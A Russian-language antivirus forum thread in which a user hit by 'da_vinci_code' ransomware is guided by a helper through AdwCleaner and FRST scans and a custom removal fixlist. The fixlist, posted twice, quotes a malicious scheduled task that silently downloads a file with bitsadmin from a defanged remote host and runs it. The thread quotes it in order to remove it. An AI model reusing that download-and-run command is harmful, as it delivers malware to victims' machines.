da_vinci_code

[Angelalina]

Вчера каким то образом был схвачен вирус, который зашифровал файлы doc, docx, xls, xlsx, pdf, jpeg на диске С и внешнем жестком диске  в длинное название типа rU3Оx39Q3RgYrrK8IGUd0HAFfRЕwiBpvTBFXGEMRD2SBUMfLSl1J0nIjWHtgIAUUU8q.A2895AF0B314D2BC7B=26 и расширение  da_vinci_code.

Проверяла утилитой доктора веба и касперский, были удалены и обезврежены троян и  Backdoor.Win32.Androm.jtql 

 

Возможно ли как то расшифровать наши файлы?

logi.rar

[thyrex]

Выполните https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url]

[Angelalina]

Выполните https://[url=http://forum.kasperskyclub.ru/index.php?showtopic=43640]Порядок оформления запроса о помощи[/url]

прошу прощения за невнимательность, очень расстроена, так как полетела вся работа, вкладываю верный файл

CollectionLog-2016.11.12-22.59.zip

[mike 1]

Вот в правилах кажется четко написано, что запускать Автологгер нужно уже после проверки Cureit или KVRT, но люди все равно предпочитают все делать по своему. Ваша невнимательность в конечном счете играет против вас. 

 

 

Скачайте AdwCleaner (by Xplode) и сохраните его на Рабочем столе.

Запустите его (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Сканировать" и дождитесь окончания сканирования.

Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt.

Прикрепите отчет к своему следующему сообщению.

 

Подробнее читайте в этом руководстве.

[Angelalina]

Доброго времени суток! 

Вынужденна признать свою глупость и невнимательность, но увы увидела этот форум уже после своих "умных" шагов.....  просто беременный мозг на фоне нервотрепки от шока потерянных за 20 лет работ, не сообразила сразу как поступить....  

 

Вот в правилах кажется четко написано, что запускать Автологгер нужно уже после проверки Cureit или KVRT, но люди все равно предпочитают все делать по своему. Ваша невнимательность в конечном счете играет против вас. 

 

 

•  

• Скачайте AdwCleaner (by Xplode) и сохраните его на Рабочем столе.

• Запустите его (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора), нажмите кнопку "Сканировать" и дождитесь окончания сканирования.

• Когда сканирование будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[s0].txt.

• Прикрепите отчет к своему следующему сообщению.

 

Подробнее читайте в этом руководстве.

 

 

AdwCleanerS0.txt

[mike 1]

Вот так люди и теряют свои данные из-за невнимательности. 

 

 

 

от шока потерянных за 20 лет работ

Глупо хранить данные в одном экземпляре. 

 

Запустите повторно AdwCleaner (by Xplode) (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора),  нажмите кнопку "Scan", а по окончанию сканирования нажмите кнопку "Очистить" ("Clean") и дождитесь окончания удаления.

Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt.

Прикрепите отчет к своему следующему сообщению

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.

[Angelalina]

 

Вот так люди и теряют свои данные из-за невнимательности. 

 

 

 

от шока потерянных за 20 лет работ

Глупо хранить данные в одном экземпляре. 

 

•  

• Запустите повторно AdwCleaner (by Xplode) (в ОС Windows Vista/7/8/8.1/10 необходимо запускать через правую кн. мыши от имени администратора),  нажмите кнопку "Scan", а по окончанию сканирования нажмите кнопку "Очистить" ("Clean") и дождитесь окончания удаления.

• Когда удаление будет завершено, отчет будет сохранен в следующем расположении: C:\AdwCleaner\AdwCleaner[C0].txt.

• Прикрепите отчет к своему следующему сообщению

Внимание: Для успешного удаления нужна перезагрузка компьютера!!!.

 

Подробнее читайте в этом руководстве.

 

впредь будем осторожнее, будет уроком...  только бы восстановить, т.к. мама преподаватель, ..

AdwCleanerS4.txt

[mike 1]

Скачайте Farbar Recovery Scan Tool   и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

1. Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".

Нажмите кнопку Scan.

После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.

Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

[Angelalina]

 

Скачайте Farbar Recovery Scan Tool   и сохраните на Рабочем столе.

 

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.

• Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

• Убедитесь, что под окном Optional Scan отмечены "List BCD", "Driver MD5" и "90 Days Files".

• Нажмите кнопку Scan.

• После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.

• Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

Addition.txt

FRST.txt

[mike 1]

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

 

• Временно выгрузите антивирус, файрволл и прочее защитное ПО.
  

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
  

CreateRestorePoint:

CloseProcesses:

HKLM\...\Policies\Explorer\Run: [AppDownloads] => C:\Program Files (x86)\Common Files\9C06BCB0-82AC-4B0A-82CD-30D1CA6E67A5\6C66C88B-7A26-4B86-8BE3-63E1C7522994.exe

GroupPolicy: Restriction <======= ATTENTION

GroupPolicy\User: Restriction <======= ATTENTION

CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION

BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File

BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File

S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]

2016-11-12 15:40 - 2016-11-12 18:21 - 00000000 __SHD C:\Users\Все пользователи\Csrss

2016-11-12 15:39 - 2016-11-12 15:39 - 06220854 _____ C:\Users\Арсений\AppData\Roaming\921EC1E8921EC1E8.bmp

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README9.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README8.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README7.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README6.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README5.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README4.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README3.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README2.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README10.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README9.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README8.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README7.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README6.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README5.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README4.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README3.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README2.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README10.txt

2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README1.txt

2016-11-12 11:40 - 2016-11-12 11:40 - 19950641 _____ C:\Users\Арсений\Downloads\47C3.tmp

2016-11-12 11:40 - 2016-11-12 11:40 - 17426301 _____ C:\Users\Арсений\Downloads\779D.tmp

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README9.txt

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README8.txt

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README7.txt

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README6.txt

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README5.txt

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README4.txt

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README3.txt

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README2.txt

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README10.txt

2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README1.txt

2016-11-10 15:31 - 2016-11-12 22:14 - 00000000 __SHD C:\Users\Все пользователи\Windows

2016-11-12 11:49 - 2016-03-25 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\adblockpro

2016-11-12 11:49 - 2016-03-04 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\Color quantizer

2016-11-12 11:49 - 2016-01-29 07:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\exchange_rates4

2016-11-12 11:49 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\everysale4

2016-11-12 11:49 - 2015-09-19 17:13 - 00000000 ____D C:\Users\Арсений\AppData\LocalLow\IObit

2016-11-12 11:49 - 2015-07-23 06:40 - 00000000 ____D C:\Users\Арсений\AppData\Local\{B7A56E6D-32CD-4B27-9475-F7986C6F0A79}

2016-11-12 11:45 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\Neiron

2016-11-12 11:42 - 2016-05-07 10:18 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\PushControl

2016-11-12 11:42 - 2016-03-11 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\PngOptimizer

2016-11-12 11:42 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\phoenixguard

2016-11-12 11:42 - 2016-01-21 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\RotatorCom

2016-11-12 15:39 - 2016-11-12 15:39 - 6220854 _____ () C:\Users\Арсений\AppData\Roaming\921EC1E8921EC1E8.bmp

2015-12-28 08:28 - 2015-12-28 08:28 - 0000000 _____ () C:\Users\Арсений\AppData\Roaming\smw_inst

2015-05-25 18:33 - 2014-11-18 02:32 - 0145792 _____ () C:\Users\Арсений\AppData\Local\downloader.exe

2015-07-09 09:43 - 2015-04-28 22:43 - 0226608 ____H () C:\Users\Арсений\AppData\Local\YаndехWоrking.bаt.exe

C:\Users\Арсений\AppData\Local\Temp\dlCC3667C5-D2D6-F246-ACCE-C8E0E11ABCF6.exe

C:\Users\Арсений\AppData\Local\Temp\fdab-bb8f-c8d6-fed8.exe

CHR Extension: (PushControl) - C:\Users\Арсений\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdapmeocgbbceopcohmbeainapanicig [2016-11-12]

OPR Extension: (PushControl) - C:\Users\Арсений\AppData\Roaming\Opera Software\Opera Stable\Extensions\jdapmeocgbbceopcohmbeainapanicig [2016-10-08]

Task: {0548EDA3-F0BE-4423-BCA4-06E67A8E4992} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-3 -> No File <==== ATTENTION

Task: {0AADEDDF-2748-43C9-BC7B-A1D633CFA60C} - \{C95FB150-ADF7-48C6-98DB-CD41E1F591A0} -> No File <==== ATTENTION

Task: {1189E51D-6237-4612-B476-9E1FB97D96B1} - \ab9abeea-5773-48bd-9edb-1523a83931f0-1-7 -> No File <==== ATTENTION

Task: {218FB66E-0FC9-49A4-A491-0AFDB348D6C6} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-7 -> No File <==== ATTENTION

Task: {2518EF67-3C14-4D63-ABC6-2C28FE79F527} - \ab9abeea-5773-48bd-9edb-1523a83931f0-5 -> No File <==== ATTENTION

Task: {26781457-5B5D-4824-9023-B7883780D852} - \661bdf61-c239-4c93-bfcf-75fc6de99748-5 -> No File <==== ATTENTION

Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION

Task: {31AD63C8-A0C2-4EC0-A360-2DF3ABB295AD} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-5 -> No File <==== ATTENTION

Task: {3ABDBA19-82A6-4797-9F52-3A5F12DBF865} - \Microsoft\Windows\AFAF010F9-3968-4D9A-B0A3-F82574967D56 -> No File <==== ATTENTION

Task: {3AE4C7D6-61BB-4EC2-98DD-B430548AA89F} - System32\Tasks\WinThruster64-Арсений-Notification => C:\Program Files\Solvusoft\WinThruster\Sync.exe [2015-10-11] (Solvusoft Corporation) <==== ATTENTION

Task: {4A851E1C-6A1F-44AA-81E1-6AC62E2E8447} - \661bdf61-c239-4c93-bfcf-75fc6de99748-3 -> No File <==== ATTENTION

Task: {57BCF1DF-9934-4325-9299-CD1F0CDFBA45} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-11 -> No File <==== ATTENTION

Task: {783C4488-97F2-45D2-AB9F-BCB1A4DB4373} - \661bdf61-c239-4c93-bfcf-75fc6de99748-1-7 -> No File <==== ATTENTION

Task: {92985D1D-263F-4204-B561-A85A0D87B510} - \ab9abeea-5773-48bd-9edb-1523a83931f0-11 -> No File <==== ATTENTION

Task: {968432BD-B93A-457C-BF8E-BDCED9265DB7} - \ab9abeea-5773-48bd-9edb-1523a83931f0-3 -> No File <==== ATTENTION

Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION

Task: {B681BEC0-9DF8-4F25-B6F9-09CFB80FDEC4} - System32\Tasks\RotatorCom => "/q /c start /min /wait bitsadmin /transfer d /download /priority foreground hxxp://krible-krable-bums.com/api/task/689556.lnk %TMP%\torrent.lnk & start %TMP%\torrent.lnk"

Task: {C424AA00-F317-400A-850A-0CFF4F3EF5EC} - \Crossbrowse -> No File <==== ATTENTION

Task: {D3B035B2-0330-4BA3-BD7B-B14EE208800F} - \ab9abeea-5773-48bd-9edb-1523a83931f0-7 -> No File <==== ATTENTION

Task: {E08B7A9E-2127-4F73-AC12-5C9AE3DF6AC0} - \661bdf61-c239-4c93-bfcf-75fc6de99748-11 -> No File <==== ATTENTION

Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION

Task: {FC385C00-011B-4B7E-97CF-B3589A5C8BE0} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-1-7 -> No File <==== ATTENTION

Task: C:\Windows\Tasks\WinThruster64-Арсений-Notification.job => C:\Program Files\Solvusoft\WinThruster\Sync.exe <==== ATTENTION

Task: C:\Windows\Tasks\WinThruster64-Арсений-Startup.job => C:\Program Files\Solvusoft\WinThruster\WinThruster64.exe <==== ATTENTION

MSCONFIG\startupreg: cobunce => "C:\Users\Арсений\AppData\Local\cobunce\stub.exe" /run "C:\Users\Арсений\AppData\Local\cobunce\config.json"

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
  

• Обратите внимание, что компьютер будет перезагружен.
  

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму
  

 

 

[Angelalina]

 

ВНИМАНИЕ! Данный скрипт написан специально для этого пользователя, использование его на другом компьютере может привести к неработоспособности Windows!

 

• Временно выгрузите антивирус, файрволл и прочее защитное ПО.

• Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:

CreateRestorePoint:
CloseProcesses:
HKLM\...\Policies\Explorer\Run: [AppDownloads] => C:\Program Files (x86)\Common Files\9C06BCB0-82AC-4B0A-82CD-30D1CA6E67A5\6C66C88B-7A26-4B86-8BE3-63E1C7522994.exe
GroupPolicy: Restriction <======= ATTENTION
GroupPolicy\User: Restriction <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Restriction <======= ATTENTION
BHO-x32: No Name -> {B69F34DD-F0F9-42DC-9EDD-957187DA688D} -> No File
BHO-x32: No Name -> {D5FEC983-01DB-414A-9456-AF95AC9ED7B5} -> No File
S1 BAPIDRV; system32\DRIVERS\BAPIDRV64.sys [X]
2016-11-12 15:40 - 2016-11-12 18:21 - 00000000 __SHD C:\Users\Все пользователи\Csrss
2016-11-12 15:39 - 2016-11-12 15:39 - 06220854 _____ C:\Users\Арсений\AppData\Roaming\921EC1E8921EC1E8.bmp
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README9.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README8.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README7.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README6.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README5.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README4.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README3.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README2.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Арсений\Desktop\README10.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README9.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README8.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README7.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README6.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README5.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README4.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README3.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README2.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README10.txt
2016-11-12 15:39 - 2016-11-12 15:39 - 00004154 _____ C:\Users\Public\Desktop\README1.txt
2016-11-12 11:40 - 2016-11-12 11:40 - 19950641 _____ C:\Users\Арсений\Downloads\47C3.tmp
2016-11-12 11:40 - 2016-11-12 11:40 - 17426301 _____ C:\Users\Арсений\Downloads\779D.tmp
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README9.txt
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README8.txt
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README7.txt
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README6.txt
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README5.txt
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README4.txt
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README3.txt
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README2.txt
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README10.txt
2016-11-10 15:32 - 2016-11-10 15:32 - 00004154 _____ C:\README1.txt
2016-11-10 15:31 - 2016-11-12 22:14 - 00000000 __SHD C:\Users\Все пользователи\Windows
2016-11-12 11:49 - 2016-03-25 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\adblockpro
2016-11-12 11:49 - 2016-03-04 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\Color quantizer
2016-11-12 11:49 - 2016-01-29 07:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\exchange_rates4
2016-11-12 11:49 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\everysale4
2016-11-12 11:49 - 2015-09-19 17:13 - 00000000 ____D C:\Users\Арсений\AppData\LocalLow\IObit
2016-11-12 11:49 - 2015-07-23 06:40 - 00000000 ____D C:\Users\Арсений\AppData\Local\{B7A56E6D-32CD-4B27-9475-F7986C6F0A79}
2016-11-12 11:45 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\Neiron
2016-11-12 11:42 - 2016-05-07 10:18 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\PushControl
2016-11-12 11:42 - 2016-03-11 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\PngOptimizer
2016-11-12 11:42 - 2016-01-28 08:20 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\phoenixguard
2016-11-12 11:42 - 2016-01-21 08:34 - 00000000 ____D C:\Users\Арсений\AppData\Roaming\RotatorCom
2016-11-12 15:39 - 2016-11-12 15:39 - 6220854 _____ () C:\Users\Арсений\AppData\Roaming\921EC1E8921EC1E8.bmp
2015-12-28 08:28 - 2015-12-28 08:28 - 0000000 _____ () C:\Users\Арсений\AppData\Roaming\smw_inst
2015-05-25 18:33 - 2014-11-18 02:32 - 0145792 _____ () C:\Users\Арсений\AppData\Local\downloader.exe
2015-07-09 09:43 - 2015-04-28 22:43 - 0226608 ____H () C:\Users\Арсений\AppData\Local\YаndехWоrking.bаt.exe
C:\Users\Арсений\AppData\Local\Temp\dlCC3667C5-D2D6-F246-ACCE-C8E0E11ABCF6.exe
C:\Users\Арсений\AppData\Local\Temp\fdab-bb8f-c8d6-fed8.exe
CHR Extension: (PushControl) - C:\Users\Арсений\AppData\Local\Google\Chrome\User Data\Default\Extensions\jdapmeocgbbceopcohmbeainapanicig [2016-11-12]
OPR Extension: (PushControl) - C:\Users\Арсений\AppData\Roaming\Opera Software\Opera Stable\Extensions\jdapmeocgbbceopcohmbeainapanicig [2016-10-08]
Task: {0548EDA3-F0BE-4423-BCA4-06E67A8E4992} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-3 -> No File <==== ATTENTION
Task: {0AADEDDF-2748-43C9-BC7B-A1D633CFA60C} - \{C95FB150-ADF7-48C6-98DB-CD41E1F591A0} -> No File <==== ATTENTION
Task: {1189E51D-6237-4612-B476-9E1FB97D96B1} - \ab9abeea-5773-48bd-9edb-1523a83931f0-1-7 -> No File <==== ATTENTION
Task: {218FB66E-0FC9-49A4-A491-0AFDB348D6C6} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-7 -> No File <==== ATTENTION
Task: {2518EF67-3C14-4D63-ABC6-2C28FE79F527} - \ab9abeea-5773-48bd-9edb-1523a83931f0-5 -> No File <==== ATTENTION
Task: {26781457-5B5D-4824-9023-B7883780D852} - \661bdf61-c239-4c93-bfcf-75fc6de99748-5 -> No File <==== ATTENTION
Task: {2F57269B-1E09-4E2D-AB1E-B0FDAC7D279C} - \Microsoft\Windows\WindowsBackup\ConfigNotification -> No File <==== ATTENTION
Task: {31AD63C8-A0C2-4EC0-A360-2DF3ABB295AD} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-5 -> No File <==== ATTENTION
Task: {3ABDBA19-82A6-4797-9F52-3A5F12DBF865} - \Microsoft\Windows\AFAF010F9-3968-4D9A-B0A3-F82574967D56 -> No File <==== ATTENTION
Task: {3AE4C7D6-61BB-4EC2-98DD-B430548AA89F} - System32\Tasks\WinThruster64-Арсений-Notification => C:\Program Files\Solvusoft\WinThruster\Sync.exe [2015-10-11] (Solvusoft Corporation) <==== ATTENTION
Task: {4A851E1C-6A1F-44AA-81E1-6AC62E2E8447} - \661bdf61-c239-4c93-bfcf-75fc6de99748-3 -> No File <==== ATTENTION
Task: {57BCF1DF-9934-4325-9299-CD1F0CDFBA45} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-11 -> No File <==== ATTENTION
Task: {783C4488-97F2-45D2-AB9F-BCB1A4DB4373} - \661bdf61-c239-4c93-bfcf-75fc6de99748-1-7 -> No File <==== ATTENTION
Task: {92985D1D-263F-4204-B561-A85A0D87B510} - \ab9abeea-5773-48bd-9edb-1523a83931f0-11 -> No File <==== ATTENTION
Task: {968432BD-B93A-457C-BF8E-BDCED9265DB7} - \ab9abeea-5773-48bd-9edb-1523a83931f0-3 -> No File <==== ATTENTION
Task: {AC4E5ACF-89F7-4220-BA21-81EE183975E2} - \Microsoft\Windows\Application Experience\AitAgent -> No File <==== ATTENTION
Task: {B681BEC0-9DF8-4F25-B6F9-09CFB80FDEC4} - System32\Tasks\RotatorCom => "/q /c start /min /wait bitsadmin /transfer d /download /priority foreground hxxp://krible-krable-bums.com/api/task/689556.lnk %TMP%\torrent.lnk & start %TMP%\torrent.lnk"
Task: {C424AA00-F317-400A-850A-0CFF4F3EF5EC} - \Crossbrowse -> No File <==== ATTENTION
Task: {D3B035B2-0330-4BA3-BD7B-B14EE208800F} - \ab9abeea-5773-48bd-9edb-1523a83931f0-7 -> No File <==== ATTENTION
Task: {E08B7A9E-2127-4F73-AC12-5C9AE3DF6AC0} - \661bdf61-c239-4c93-bfcf-75fc6de99748-11 -> No File <==== ATTENTION
Task: {FA2BC0A6-8D4B-458A-85C8-2B8C72487513} - \Microsoft\Windows\MemoryDiagnostic\DecompressionFailureDetector -> No File <==== ATTENTION
Task: {FC385C00-011B-4B7E-97CF-B3589A5C8BE0} - \f7aa40be-f373-4ef2-ade7-3b85ecd26692-1-7 -> No File <==== ATTENTION
Task: C:\Windows\Tasks\WinThruster64-Арсений-Notification.job => C:\Program Files\Solvusoft\WinThruster\Sync.exe <==== ATTENTION
Task: C:\Windows\Tasks\WinThruster64-Арсений-Startup.job => C:\Program Files\Solvusoft\WinThruster\WinThruster64.exe <==== ATTENTION
MSCONFIG\startupreg: cobunce => "C:\Users\Арсений\AppData\Local\cobunce\stub.exe" /run "C:\Users\Арсений\AppData\Local\cobunce\config.json"

• Запустите FRST и нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!

• Обратите внимание, что компьютер будет перезагружен.

• Внимание! Если на рабочем столе будет создан архив Дата_время.zip, то загрузите этот архив через данную форму

 

Fixlog.txt

[mike 1]

Смените все пароли. Пишите запрос  https://forum.kasperskyclub.ru/index.php?showtopic=48525